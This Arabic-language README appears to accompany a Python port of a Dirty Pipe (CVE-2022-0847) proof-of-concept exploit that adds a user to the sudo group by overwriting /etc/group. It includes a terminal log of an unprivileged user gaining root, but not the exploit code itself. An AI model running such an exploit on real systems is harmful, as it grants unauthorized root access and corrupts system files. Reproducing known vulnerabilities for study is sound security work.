
استغلال برهان مفهوم (POC) لإضافة مستخدم إلى Sudo من أجل ثغرة Dirty Pipe CVE-2022-0847
هذا المستودع مبني على الثغرة والشرح والاستغلال الذي أنتجه Max Kellermann وكلها موجودة هنا.
مثل أي شخص، كان عليّ الاستفادة من اللعب بأسهل ثغرة لتصعيد الامتياز (Priv Esc) في العالم لإعادة إنتاجها، ويقوم المقال في المدونة بعمل رائع في شرح كل ذلك.
لقد قمت بترجمة الاستغلال إلى Python فقط لفهمه بشكل أفضل، لكن هذه نسخة طبق الأصل من استغلال C مع تضمين تصعيد امتياز Sudo بشكل ثابت.
Python 3.10 (بسبب استخدام استدعاء os.splice)
يتلف ملف /etc/group عن طريق الكتابة في السطر الذي يلي إدخال sudo مباشرة. ولكن عندما تكون root يمكنك إصلاح ذلك باستخدام النسخة.
يضع نسخة من /etc/group في /tmp/group_backup
test@kali:/home/user/working$ whoami
test
test@kali:/home/user/working$ sudo whoami
test is not in the sudoers file. This incident will be reported.
test@kali:/home/user/working$ python3.10 poc.py
[*] Dirty PIPE POC [*]
[*] Exploit will add test to sudoers
[*] Finding offset of sudo entry in /etc/group
[*] Found sudo group offset
[*] Confirmed it is not last.
[*] Opening /etc/group
[*] Opening PIPE
[*] Contaminating flags of pipe buffer
[*] 65536 bytes written to pipe
[*] 65536 bytes read from pipe
[*] Splicing byte from /etc/group to pipe
[*] Spliced 1 bytes
[*] Altering group to add test
[*] 6 bytes written to /etc/group
test@kali:/home/user/working$ su test
Password:
test@kali:/home/user/working$ sudo whoami
root
test@kali:/home/user/working$